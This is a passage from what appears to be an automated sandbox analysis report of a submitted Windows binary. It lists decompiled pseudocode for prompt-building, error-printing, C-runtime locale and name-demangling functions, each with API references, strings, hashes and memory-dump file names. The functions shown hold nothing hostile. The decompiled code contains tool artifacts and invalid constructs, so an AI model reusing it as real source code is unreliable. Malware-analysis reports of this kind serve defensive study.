									goto L45;
								case 3:
									__ecx = 0x7c;
									__edx = _v8;
									 *_v8 = __cx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 4:
									__ecx = 0x28;
									__edx = _v8;
									 *_v8 = __cx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 5:
									__ecx = _v8;
									__edx =  &_v1584;
									_v8 -  &_v1584 = _v8 -  &_v1584 >> 1;
									0x104 = 0x104 - (_v8 -  &_v1584 >> 1);
									__ecx = _v8;
									__eax = GetDateFormatW(0x400, 1, 0, 0, _v8, 0x104 - (_v8 -  &_v1584 >> 1));
									while(1) {
										__edx = _v8;
										__eax =  *_v8 & 0x0000ffff;
										if(( *_v8 & 0x0000ffff) == 0) {
											break;
										}
										_v8 =  &(_v8[1]);
										_v8 =  &(_v8[1]);
									}
									goto L45;
								case 6:
									__edx = 0x1b;
									__eax = _v8;
									 *_v8 = __dx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 7:
									__edx = 0x29;
									__eax = _v8;
									 *_v8 = __dx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 8:
									__edx = 0x3e;
									__eax = _v8;
									 *_v8 = __dx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 9:
									__edx = 8;
									__eax = _v8;
									 *_v8 = __dx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 0xa:
									__edx = 0x3c;
									__eax = _v8;
									 *_v8 = __dx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 0xb:
									__edx =  &_v544;
									_push( &_v544);
									__eax =  &_v544;
									0x400000();
									_v20 = GetCurrentDirectoryW( &_v544,  &_v544);
									if(_v20 != 0) {
										__ecx = 2;
										__edx = 0;
										__eax = _v8;
										__cx =  *((intOrPtr*)(__ebp + 0xfffffffffffffde4));
										 *_v8 = __cx;
										_v8 =  &(_v8[1]);
										_v8 =  &(_v8[1]);
									}
									goto L45;
								case 0xc:
									__eax =  &_v544;
									_push(__eax);
									__ecx =  &_v544;
									0x400000();
									_v20 = __eax;
									if(_v20 == 0) {
										L31:
										goto L45;
									}
									__edx =  &_v544;
									_v8 = lstrcatW(_v8,  &_v544);
									while(1) {
										__ecx = _v8;
										__edx =  *_v8 & 0x0000ffff;
										if(( *_v8 & 0x0000ffff) == 0) {
											goto L31;
										}
										_v8 =  &(_v8[1]);
										_v8 =  &(_v8[1]);
									}
									goto L31;
								case 0xd:
									__ecx = 0x3d;
									__edx = _v8;
									 *_v8 = __cx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 0xe:
									__ecx = 0x20;
									__edx = _v8;
									 *_v8 = __cx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 0xf:
									__ecx = _v8;
									__eax = GetTimeFormatW(0x400, 0, 0, 0, _v8, 0x104);
									while(1) {
										__edx = _v8;
										__eax =  *_v8 & 0x0000ffff;
										if(( *_v8 & 0x0000ffff) == 0) {
											break;
										}
										_v8 =  &(_v8[1]);
										_v8 =  &(_v8[1]);
									}
									goto L45;
								case 0x10:
									__edx = _v8;
									__eax = lstrcatW(_v8, 0x456f00);
									while(1) {
										__eax = _v8;
										__ecx =  *_v8 & 0x0000ffff;
										if(( *_v8 & 0x0000ffff) == 0) {
											break;
										}
										_v8 =  &(_v8[1]);
										_v8 =  &(_v8[1]);
									}
									goto L45;
								case 0x11:
									__eax = 0xa;
									__ecx = _v8;
									 *_v8 = __ax;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
									goto L45;
								case 0x12:
									goto L45;
							}
						}
						 *_v8 =  *_v12;
						_v8 =  &(_v8[1]);
						_v12 =  &(_v12[1]);
						 *_v8 = 0;
						goto L46;
					}
					return E004041D0( &_v1584);
				}
				0x400000( &_v1064);
				if(_v24 < _t120) {
					goto L3;
				}
				goto L2;
			}

0x00405229
0x00405230
0x00405242
0x00405248
0x0040524f
0x00405262
0x0040526e
0x00405274
0x0040527a
0x00405283
0x0040528a
0x00405294
0x0040529d
0x004052a8
0x004052b1
0x004052b1
0x004052b9
0x004052bc
0x004052d3
0x00405306
0x00405310
0x00405315
0x00405318
0x00405321
0x00405328
0x004055c9
0x004055cf
0x004055d7
0x004055da
0x00000000
0x004055da
0x00405331
0x00405338
0x00000000
0x00405347
0x00405350
0x00000000
0x00000000
0x0040559f
0x004055a1
0x004055a6
0x004055ac
0x004055b0
0x004055b8
0x004055bd
0x004055c0
0x004055c3
0x004055c6
0x004055c6
0x00000000
0x00000000
0x00405358
0x0040535d
0x00405360
0x00405366
0x00405369
0x00000000
0x00000000
0x00405371
0x00405376
0x00405379
0x0040537f
0x00405382
0x00000000
0x00000000
0x0040538a
0x0040538f
0x00405392
0x00405398
0x0040539b
0x00000000
0x00000000
0x004053a3
0x004053a6
0x004053ae
0x004053b5
0x004053b8
0x004053c7
0x004053cd
0x004053cd
0x004053d0
0x004053d5
0x00000000
0x00000000
0x004053da
0x004053dd
0x004053dd
0x00000000
0x00000000
0x004053e7
0x004053ec
0x004053ef
0x004053f5
0x004053f8
0x00000000
0x00000000
0x00405400
0x00405405
0x00405408
0x0040540e
0x00405411
0x00000000
0x00000000
0x00405419
0x0040541e
0x00405421
0x00405427
0x0040542a
0x00000000
0x00000000
0x00405432
0x00405437
0x0040543a
0x00405440
0x00405443
0x00000000
0x00000000
0x0040544b
0x00405450
0x00405453
0x00405459
0x0040545c
0x00000000
0x00000000
0x00405464
0x0040546a
0x0040546b
0x00405472
0x0040547e
0x00405485
0x00405487
0x0040548c
0x0040548f
0x00405492
0x0040549a
0x004054a0
0x004054a3
0x004054a3
0x00000000
0x00000000
0x004054ab
0x004054b1
0x004054b2
0x004054b9
0x004054c5
0x004054cc
0x004054f4
0x00000000
0x004054f4
0x004054ce
0x004054d9
0x004054df
0x004054df
0x004054e2
0x004054e7
0x00000000
0x00000000
0x004054ec
0x004054ef
0x004054ef
0x00000000
0x00000000
0x004054f9
0x004054fe
0x00405501
0x00405507
0x0040550a
0x00000000
0x00000000
0x00405512
0x00405517
0x0040551a
0x00405520
0x00405523
0x00000000
0x00000000
0x00405530
0x0040553f
0x00405545
0x00405545
0x00405548
0x0040554d
0x00000000
0x00000000
0x00405552
0x00405555
0x00405555
0x00000000
0x00000000
0x00405561
0x00405565
0x0040556b
0x0040556b
0x0040556e
0x00405573
0x00000000
0x00000000
0x00405578
0x0040557b
0x0040557b
0x00000000
0x00000000
0x00405582
0x00405587
0x0040558a
0x00405590
0x00405593
0x00000000
0x00000000
0x00000000
0x00000000
0x00405338
0x004052de
0x004052e7
0x004052f0
0x004052f8
0x00000000
0x004052f8
0x004055ee
0x004055ee
0x00405258
0x00405260
0x00000000
0x00000000
0x00000000

APIs

GetEnvironmentVariableW.KERNEL32(PROMPT,?,00000000), ref: 00405242
lstrcpyW.KERNEL32 ref: 0040526E

Strings

;, xrefs: 00405324
PROMPT, xrefs: 0040523D
$P$G, xrefs: 00405262

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: EnvironmentVariablelstrcpy
String ID: $P$G$;$PROMPT
API String ID: 791083388-360076919
Opcode ID: 2da4fc956a494603532cce68aa9e2a2ed4a7faee444832885b277efe3594e244
Instruction ID: 3cef8690c70f152916a9b8049750ea74da04bcaae94e8100510684035330cd6f
Opcode Fuzzy Hash: 2da4fc956a494603532cce68aa9e2a2ed4a7faee444832885b277efe3594e244
Instruction Fuzzy Hash: F9C1E974A01608EFDB14CF94D955BAEB7B2FF48304F2084AAE501AB394D634AF41EF59

Uniqueness

Uniqueness Score: -1.00%

Function 004047C0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 64
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004047C0() {
				char _v8;
				long _v12;
				long _v16;
				signed char* _v20;
				void* _v24;
				void* _t17;
				int _t19;
				void* _t22;
				signed int _t26;
				signed char* _t31;
				signed char* _t34;
				void* _t37;

				_v12 = GetLastError();
				_t2 =  &_v8; // 0x4030e0
				_v16 = FormatMessageW(0x1100, 0, _v12, 0, _t2, 0, 0);
				if(_v16 != 0) {
					_t17 = GetStdHandle(0xfffffff4);
					_t11 =  &_v8; // 0x4030e0
					_t19 = lstrlenW( *_t11);
					_t12 =  &_v8; // 0x4030e0
					E00404330(_t19,  *_t12, _t19, _t17);
					_t13 =  &_v8; // 0x4030e0
					LocalFree( *_t13);
					_t22 = GetStdHandle(0xfffffff4);
					return E00404330(lstrlenW(L"\r\n"), L"\r\n", _t23, _t22);
				} else {
					goto L1;
				}
				do {
					L1:
					_t34 =  *0x4494a8; // 0x4533bc
					_t26 =  *_t34 & 1;
					if(_t26 != 0) {
						_t31 =  *0x4494a8; // 0x4533bc
						_v20 = _t31;
						_v24 = 0;
						_push(GetLastError());
						_t26 = E00406000(_v24, _v20, "WCMD_print_error", "Cannot display message for error %ld, status %ld\n", _v12);
						_t37 = _t37 + 0x18;
					}
				} while (0 != 0);
				return _t26;
			}

0x004047cc
0x004047d3
0x004047ea
0x004047f1
0x0040483e
0x00404845
0x00404849
0x00404850
0x00404854
0x00404859
0x0040485d
0x00404865
0x00000000
0x00000000
0x00000000
0x00000000
0x004047f3
0x004047f3
0x004047f3
0x004047fc
0x004047ff
0x00404801
0x00404807
0x0040480a
0x00404817
0x0040482e
0x00404833
0x00404833
0x00404836
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,004030E0,?,?,00000000,00000000), ref: 004047C6
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,0@,00000000,00000000,?,?,?,?,004030E0,?,?,00000000,00000000), ref: 004047E4
GetLastError.KERNEL32 ref: 00404811
GetStdHandle.KERNEL32(000000F4), ref: 0040483E
lstrlenW.KERNEL32(0@,00000000), ref: 00404849
LocalFree.KERNEL32(0@,0@,00000000), ref: 0040485D
GetStdHandle.KERNEL32(000000F4), ref: 00404865
lstrlenW.KERNEL32(004534F4,00000000), ref: 00404871

Strings

0@, xrefs: 004047D3, 00404845, 00404850, 00404859, 004047D6, 00404848, 00404853, 0040485C
WCMD_print_error, xrefs: 00404821
Cannot display message for error %ld, status %ld, xrefs: 0040481C

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorHandleLastlstrlen$FormatFreeLocalMessage
String ID: Cannot display message for error %ld, status %ld$WCMD_print_error$0@
API String ID: 3137382630-3033760833
Opcode ID: 7972440fb6c75a85c23762e38658772d383b39c7c088261ffd1894060077ea72
Instruction ID: afdb578f75d437babed43bc031c9a768cdcf2ebacd5de725ca6fb2382024d4d0
Opcode Fuzzy Hash: 7972440fb6c75a85c23762e38658772d383b39c7c088261ffd1894060077ea72
Instruction Fuzzy Hash: 83218EBA900204BFD714EFE4DC09BAF7778EB49312F204169FA01A22C0C6745E41DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00434865 Relevance: 18.4, APIs: 12, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00434865(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t105;
				signed int _t115;
				signed int _t117;
				signed int _t121;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t137;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t157;
				signed int _t161;
				signed int _t165;
				signed int _t169;
				signed int _t173;
				signed int _t177;
				signed int _t181;
				signed int _t185;
				signed int _t189;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E00430BC8(1, 0x50);
					_v8 = _t235;
					E0042E2C2(0);
					if(_t235 != 0) {
						_t228 = E00430BC8(1, 4);
						_v12 = _t228;
						E0042E2C2(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x454980, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E00430BC8(1, 4);
							_v16 = _t233;
							E0042E2C2(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t115 = E0043DCA8(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t117 = E0043DCA8(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t121 = E0043DCA8(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x16, _v8 + 0x14);
								_t125 = E0043DCA8(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t129 = E0043DCA8(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x18, _v8 + 0x1c);
								_t133 = E0043DCA8(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20);
								_t137 = E0043DCA8(_t225,  &_v28, 1, _t234, 0x51, _v8 + 0x24);
								_t141 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28);
								_t145 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29);
								_t149 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a);
								_t153 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b);
								_t157 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c);
								_t161 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x57, _v8 + 0x2d);
								_t165 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e);
								_t169 = E0043DCA8(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f);
								_t173 = E0043DCA8(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38);
								_t177 = E0043DCA8(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c);
								_t181 = E0043DCA8(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40);
								_t185 = E0043DCA8(_t225,  &_v28, 2, _t234, 0x17, _v8 + 0x44);
								_t189 = E0043DCA8(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48);
								if((E0043DCA8(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c) | _t115 | _t117 | _t121 | _t125 | _t129 | _t133 | _t137 | _t141 | _t145 | _t149 | _t153 | _t157 | _t161 | _t165 | _t169 | _t173 | _t177 | _t181 | _t185 | _t189) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t195 =  *_t227;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t196 = _t258 + 1;
												_t222 =  *_t196;
												 *_t258 = _t222;
												_t258 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00434767(_v8);
								E0042E2C2(_v8);
								E0042E2C2(_v12);
								E0042E2C2(_v16);
								goto L4;
							}
							E0042E2C2(_t235);
							E0042E2C2(_v12);
							L7:
							goto L4;
						}
						E0042E2C2(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x454980;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E0042E2C2( *(_t209 + 0x88));
							E0042E2C2( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x00434865
0x0043486e
0x00434875
0x00434878
0x0043487b
0x00434884
0x004348a6
0x004348aa
0x004348ad
0x004348b7
0x004348ca
0x004348ce
0x004348d1
0x004348db
0x004348ed
0x00434b80
0x00434b81
0x00434b83
0x00434b8b
0x00434b8f
0x00434b94
0x00434b9f
0x00434bab
0x00434bb7
0x00434bc3
0x00434bc9
0x00434bcd
0x00434bcf
0x00434bcf
0x00000000
0x00434bcd
0x004348fc
0x00434900
0x00434903
0x0043490d
0x00434921
0x00434927
0x00434934
0x0043494b
0x00434962
0x00434979
0x00434989
0x00434996
0x004349ad
0x004349c4
0x004349db
0x004349f5
0x00434a0c
0x00434a23
0x00434a3a
0x00434a54
0x00434a6b
0x00434a82
0x00434a99
0x00434ab3
0x00434aca
0x00434ae1
0x00434af8
0x00434b1c
0x00434b4a
0x00434b59
0x00434b59
0x00434b5d
0x00000000
0x00000000
0x00434b4e
0x00434b4e
0x00434b54
0x00434b63
0x00434b58
0x00434b58
0x00000000
0x00434b58
0x00434b65
0x00434b67
0x00434b67
0x00434b6a
0x00434b6c
0x00434b6e
0x00434b70
0x00000000
0x00434b74
0x00434b56
0x00000000
0x00434b56
0x00000000
0x00434b5f
0x00434b22
0x00434b28
0x00434b31
0x00434b3a
0x00000000
0x00434b3f
0x00434910
0x00434919
0x004348e3
0x00000000
0x004348e3
0x004348de
0x00000000
0x004348de
0x004348b9
0x00000000
0x0043488e
0x0043488e
0x00434890
0x00434893
0x00434bd1
0x00434bd1
0x00434bd9
0x00434bdb
0x00434bdb
0x00434be3
0x00434be8
0x00434bec
0x00434bf4
0x00434bfc
0x00434c02
0x00434bec
0x00434c06
0x00434c0b
0x00434c11
0x00000000
0x00434c11

APIs

_free.LIBCMT ref: 004348AD
_free.LIBCMT ref: 004348D1
_free.LIBCMT ref: 004348DE
_free.LIBCMT ref: 00434903
_free.LIBCMT ref: 00434910
_free.LIBCMT ref: 00434919
_free.LIBCMT ref: 00434BF4
_free.LIBCMT ref: 00434BFC

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9caa9a1185a88bdaada92f9f8c1feb5dbbeac75276a4fc8a7999e684129aba4e
Instruction ID: ce9c190ecee4e6c9ef2b0b5fbf7eb3831b408592db029a40bed8e891427b65f0
Opcode Fuzzy Hash: 9caa9a1185a88bdaada92f9f8c1feb5dbbeac75276a4fc8a7999e684129aba4e
Instruction Fuzzy Hash: F4C17976E00204AFDB20DBA9DC82FEEB7F8AF48714F141056FA05FB282D574E9408B64

Uniqueness

Uniqueness Score: -1.00%

Function 00410E5C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E00410E5C(void* __edx, void* __edi, char* _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char* _v48;
				char _v56;
				char _v64;
				void* __ebx;
				void* __esi;
				signed int _t51;
				char** _t57;
				char* _t58;
				char** _t60;
				char* _t66;
				char** _t78;
				signed int* _t79;
				signed int* _t80;
				char* _t84;
				char _t85;
				signed int* _t113;
				char* _t116;
				signed int* _t118;
				signed int _t119;

				_t115 = __edi;
				_t114 = __edx;
				_t51 =  *0x454264; // 0x8c4320d5
				_v8 = _t51 ^ _t119;
				_t84 = _a4;
				_t118 =  *0x456018; // 0x0
				_v48 = _t84;
				_t85 =  *_t118;
				_t54 = _t85 + 0xffffffd0;
				_v33 = _t85;
				if(_t85 + 0xffffffd0 > 9) {
					_push(__edi);
					if(_t85 != 0x3f) {
						if(E00411324(_t118, "template-parameter-", 0x13) != 0) {
							if(E00411324(_t118, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t57 = E0040A9D2( &_v56, 0x456018, 0x40);
									L20:
									_t84 = _t57[1];
									_t116 =  *_t57;
								} else {
									_t116 = 0;
									_t118 =  &(_t118[0]);
									_t84 = 0;
									 *0x456018 = _t118;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t118 =  &(_t118[3]);
							_v28 = 0xe;
							L9:
							 *0x456018 = _t118;
							E0040FA6B(_t114,  &_v44);
							if(( *0x456020 & 0x00004000) == 0 ||  *0x456028 == 0) {
								E0040AEC8(E0040AA52( &_v56,  &_v32),  &_v32,  &_v44);
								_t66 =  &_v64;
								goto L14;
							} else {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								E0040FAFA( &_v44,  &_v24, 0x10);
								_t118 =  *0x456028; // 0x0
								 *0x4492c4(E0042BCF9( &_v44,  &_v24));
								if( *_t118() == 0) {
									E0040AEC8(E0040AA52( &_v64,  &_v32),  &_v32,  &_v44);
									_t66 =  &_v56;
									L14:
									_t57 = E0040AEEA( &_v32, _t66, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t57 = E0040A59C( &_v44, _t73);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t118 =  &(_t118[4]);
						_v28 = 0x14;
						goto L9;
					} else {
						_t78 = E0040FF2D(_t84, __edx, __edi, _t118,  &_v44, 0);
						_t116 =  *_t78;
						_t84 = _t78[1];
						_t79 =  *0x456018; // 0x0
						_v32 = _t116;
						_v28 = _t84;
						_t80 =  &(_t79[0]);
						 *0x456018 = _t80;
						if( *_t79 != 0x40) {
							_t81 = _t80 - 1;
							 *0x456018 = _t80 - 1;
							E0040ADC2( &_v32, (0 |  *_t81 != 0x00000000) + 1);
							_t84 = _v28;
							_t116 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x456010; // 0x0
							if( *_t118 != 9 && _t116 != 0) {
								_t60 = E0040E436(0x456034, 8);
								if(_t60 != 0) {
									 *_t60 = _t116;
									_t60[1] = _t84;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t60;
								}
							}
						}
						_t58 = _v48;
						 *_t58 = _t116;
						_t58[4] = _t84;
						_pop(_t115);
						goto L27;
					}
				} else {
					_t113 =  *0x456010; // 0x0
					 *0x456018 = _t118;
					E0040ADF4(_t113, _t84, _t54);
					_t58 = _t84;
					L27:
					return E004085C2(_t58, _t84, _v8 ^ _t119, _t114, _t115, _t118);
				}
			}

0x00410e5c
0x00410e5c
0x00410e62
0x00410e69
0x00410e6d
0x00410e71
0x00410e77
0x00410e7a
0x00410e7f
0x00410e82
0x00410e88
0x00410ea5
0x00410ea9
0x00410f0d
0x00410f34
0x00411008
0x00411027
0x0041102c
0x0041102c
0x0041102f
0x00411010
0x00411010
0x00411012
0x00411013
0x00411015
0x00411015
0x00000000
0x00411008
0x00410f3a
0x00410f41
0x00410f44
0x00410f4b
0x00410f4e
0x00410f55
0x00410f65
0x00410ffa
0x00410fff
0x00000000
0x00410f70
0x00410f75
0x00410f7b
0x00410f7c
0x00410f7d
0x00410f82
0x00410f87
0x00410f9a
0x00410fa5
0x00410fcf
0x00410fd4
0x00410fd7
0x00410fdd
0x00000000
0x00410fdd
0x00410fa7
0x00410fae
0x00410fb2
0x00000000
0x00410fb2
0x00410f65
0x00410f0f
0x00410f16
0x00410f19
0x00000000
0x00410eab
0x00410eb1
0x00410eb8
0x00410eba
0x00410ebd
0x00410ec2
0x00410ec5
0x00410eca
0x00410ecb
0x00410ed3
0x00410ed9
0x00410edc
0x00410eeb
0x00410ef0
0x00410ef3
0x00410ef3
0x00411031
0x00411035
0x00411037
0x00411040
0x0041104d
0x00411054
0x00411056
0x00411058
0x0041105b
0x0041105f
0x0041105f
0x00411054
0x00411040
0x00411063
0x00411066
0x00411068
0x0041106b
0x00000000
0x0041106b
0x00410e8a
0x00410e8a
0x00410e93
0x00410e99
0x00410e9e
0x0041106c
0x00411079
0x00411079

APIs

Replicator::operator[].LIBCMT ref: 00410E99
DName::operator=.LIBVCRUNTIME ref: 00410EEB

Strings

template-parameter-, xrefs: 00410EFD
generic-type-, xrefs: 00410F24
4`E, xrefs: 00411048
@, xrefs: 0041100A

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: 4`E$@$generic-type-$template-parameter-
API String ID: 3211817929-3858243890
Opcode ID: a3f1070dcf31bd10f581367e2cee766e8494ff649690f8d69c4c2f055274ba06
Instruction ID: 6d8a3a92b96200f8092db2fad2118ed26395b969d8a2195c2b75511e94e26418
Opcode Fuzzy Hash: a3f1070dcf31bd10f581367e2cee766e8494ff649690f8d69c4c2f055274ba06
Instruction Fuzzy Hash: 9161A371D003499FDB14DFA5D841BEEBBB4AF08304F51402BE605A72E1DB789989CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C634 Relevance: 16.9, APIs: 11, Instructions: 362
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0040C634(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				char* _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				char* _v32;
				char _v40;
				signed char _t144;
				signed int* _t146;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int* _t202;
				void* _t205;
				signed int _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				signed int _t219;
				signed int _t220;
				char** _t222;
				signed int _t232;
				signed char _t236;
